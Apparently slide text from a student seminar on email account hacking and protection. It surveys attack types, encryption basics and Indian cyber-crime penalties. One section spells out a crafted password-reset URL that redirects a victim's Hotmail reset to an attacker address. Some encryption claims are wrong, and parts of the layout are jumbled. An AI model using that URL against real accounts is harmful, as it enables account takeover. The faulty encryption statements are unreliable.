Sudhir Pratap Singh Rathore

Basics related to the seminar topic

E-Mail: E-mail is a method of exchanging digital messages from author to one or more recipients. Hacking: Unauthorized use or attempts to bypass security mechanism of an information system. Hacker: A programmer who breaks into computer system in order to steal or change or destroy information as a form of cyber-terrorism.

Cracking E-mail Accounts E-mail Hacking is one of the most common attacks on the internet.
Do you think someone is sending abusive e-mails

from your account to everybody in the address book? Do you suspect that someone has been reading your e-mail?

There are a few different techniques that are commonly used by attackers, namely:
a. Password Guessing b. Forgot Password Attacks c. Brute Force Password Cracking d. Phishing Attacks e. Input Validation Attacks f.

Keylogging

Password Guessing
Low Threat Level Easily Executed Very common, but not very effective

It is the most common attack. Attacker gathers as much personal information about victim as possible and then simply tries his luck by entering different combination.

Forgot Password Attacks

Mid level threat Easily Executed Not very Effective

It is an extension to password guessing attack. All e-mail service providers have an option that allows user to reset or retrieve their E-mail account password by answering few predefined questions.

Brute Force Password Attacks

High level threat. Very slow. Very effective.

In this attack, an automatic tool or script tries all possible combinations of available keywords. Such a hit and trial method.

Phishing
Very high level threat Easily executed More effective

Phishing is a technique in which attacker creates a fake timed out screen or re-login screen or error screen and sends it victim hoping that victim will re-enter account username and password. Such account information reaches the attacker.

Input Validation Attacks

Very high threat level. Easily executed, not so common. Very effective.

This attack allows an attacker to illegitimately reset the password of any victim without any proper authorization. This attack can easily be executed in following steps: a) Open internet browser. b) Copy and paste under mentioned URL into address bar of the browser:

http://register.passport.net e-mailpwdreset.srf?lc=1033 &em=victim@hotmail.com&id=&cb=&prefem=attacke r@attacker.com&rst=1

Simply press enter and an e-mail will be sent to attackers e-mail address, will allow attacker to change victims password without entering any authorization.

Keylogging It refers to the process of recording each and every key strokes that a user types on a specific computer keyboard. This can be done using a small software program called keylogger also known as spy software .

Securing E-mail Accounts

Basic terminology that a user can use to not let hacker easily hack your E-mail account: Password should not be too short. Try to use both uppercase and lowercase. Try to use combination of alphabets, numbers and special characters. Keep changing your password. Do not use same password for all your accounts. Use a secure internet connection.

There is no any particular software to protect the Email account. Basically a concept is used to secure Email is Encryption. Encryption is the process of converting plain text file into scrambled data using a predefined encryption algorithm. Encrypted text back into original plaintext form by simply running the predefined decryption algorithm.
Plaintext (encryption) (decryption) plaintext CIPHERTEXT

Some encryption terms defined:

Plaintext : The original human readable data that has not been encrypted. Ciphertext : The scrambled data that has been encrypted using an algorithm. Cipher : Mathematical process that converts plaintext data into ciphertext data. Cryptography : The art of using mathematics or logical algorithms to carry out encryption and decryption of data. Cryptanalysis : Using of logical algorithms to break a cipher to retrieve original data.

Background Information on Encryption A strong encryption algorithm rely on two different features to successfully encrypt data: 1) Mathematical Algorithm 2) Keys Mathematical algorithm uses a set of mathematical formulas that convert plaintext data into ciphertext. Mathematical algorithms are quite easy so that attacker can easily download such algorithms to break an encryption system.

Modern days encryption system not only rely on mathematical algorithms but also use keys to encrypt plaintext into cipher text. Keys are piece of data that are used by mathematical algorithms. Keys are unique for each user and are randomly generated by user himself. It means that same piece of plaintext data when encrypted using same algorithm but with different keys, will generate two different sets of ciphertext data. Hence, an attacker can decrypt ciphertext into original plaintext only with help of the correct key.

For example: plaintext* (algorithm1+private key)=ciphertext1 plaintext*(algorithm1+private key2)=ciphertext2 It introduces a problem that how to securely transfer the private key of sender to recipient, when sender sends a encrypted message to recipient, so that recipient can decrypt that ciphertext. This weakness of encryption system can be resolved with help of set of two different keys: Private key Public key

Each user is assigned both Private key (used for decryption) and Public key (used for encryption).

User makes his public key available to all users on internet, keeping his private key guarded securely.
Anyone can use public key to send you encrypted mail. Such encrypted e-mail can be decrypted with the help of private key. So attacker will need public key along with private key to decrypt the encrypted e-mail.

Public and Private keys are mathematically related, it is very difficult to retrieve private key of a victim from just public key. A slight possibility that a attacker might retrieve private key of the victim but by choosing keys of long size make more difficulty to the attacker to break the private key. For example, a 1024 bits key is considered to be very secure (at least for now).

There are few acts on cyber crime, such are:

Cyber stalking: Stealthily following a person

punishment

and tracing his internet chat. : 3 years and fine up to 2 lakh.

Cyber Terrorism : Protection against cyber

punishment

terrorism. : Imprisonment for a term, may extend to 7years.

Privacy : Unauthorized access to computer.

Relevant sections in IT act- 43,66,67,69,72.

 Cyber Hacking : Alteration, deletion, destruction

punishment
Phishing

in computer system. : 3years or fine up to 2 lakh. : Bank financial fraud in electronic banking. : 3years or with fine up to 2 lakh.

punishment

Thank You